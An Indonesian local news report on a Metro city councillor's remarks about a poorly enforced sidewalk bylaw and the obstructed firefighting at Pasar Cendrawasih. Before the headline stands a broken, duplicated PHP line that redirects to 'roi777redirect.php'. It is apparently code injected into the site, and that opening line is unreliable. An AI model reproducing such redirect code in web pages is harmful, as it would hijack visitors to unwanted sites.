header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Dewan Sayangkan Perda Trotoar dan Pinggir Jalan Tidak Optimal -
Dewan Sayangkan Perda Trotoar dan Pinggir Jalan Tidak Optimal

TRANSLAMPUNG.COM, METRO – Proses pemadaman kebakaran di Pasar Cendrawasih dinilai lamban. Banyak faktor penyebab hal itu bisa terjadi salah satunya adalah tidak berjalanya Peraturan Daerah (Perda) tentang trotoar dan pinggir jalan.

Nasrianto Effendi selaku anggota DPRD Kota Metro dari Fraksi PKS mengatakan, sebenarnya ada Perda yang ada tentang trotoar dan pinggir jalan namun tidak berjalan optimal, nyatanya masih banyak pedagang yang berjualan di trotoar dan pinggir jalan sehingga memperlambat proses evakuasi kebakaran.

“Akibatnya karena trotoar dipakai berdagang tat kala terjadi kejadian musibah seperti ini, akibatnya mobil damkar kesulitan untuk mendekati titik api,” kata Nasrianto, Senin (16/4).

Menurutnya aturan yang sudah dibentuk adalah untuk kebaikan bersama. Dia mengatakan kebakaran adalah merupakan musibah.

“Sehingga kita meminta pedagang yang ada untuk bersabar terhadap musibah tersebut. Kemudian selanjutnya melihat kejadian kebakaran itu, kita belum bisa memastikan apakah api berasal dari listrik dari yang konslet atau yang lainya. Pihak berwenang masih mencari penyebab kebakaran tersebut,” ujarnya.

Selanjutnya, setelah dia datang pagi-pagi sekali dimana memang itu damkar yang berfungsi ada satu kemudian baru datang damkar lain.

“Kemudian baru setelah itu damkar susah mendekatkan damkar ke lokasi kebakaran karena banyak barang-barang pedagang, toko rapat sekali sehingga menghalangi damkar itu sendiri,” katanya.

Pedagang meminta untuk sementara waktu mereka untuk berdagang di daerah tersebut. Ini tentu saja hal yang patut dipertimbangkan oleh pemerintah kota.

“Nanti setelah bulan ramadhan atau idul fitri. Dalam rangka menata keindahan kota, seharusnya dibuat perjanjian tertulis hitam di atas putih agar pemerintah daerah bisa melakukan penataan secara baik,” katanya. (suf/hkw)

News Reporter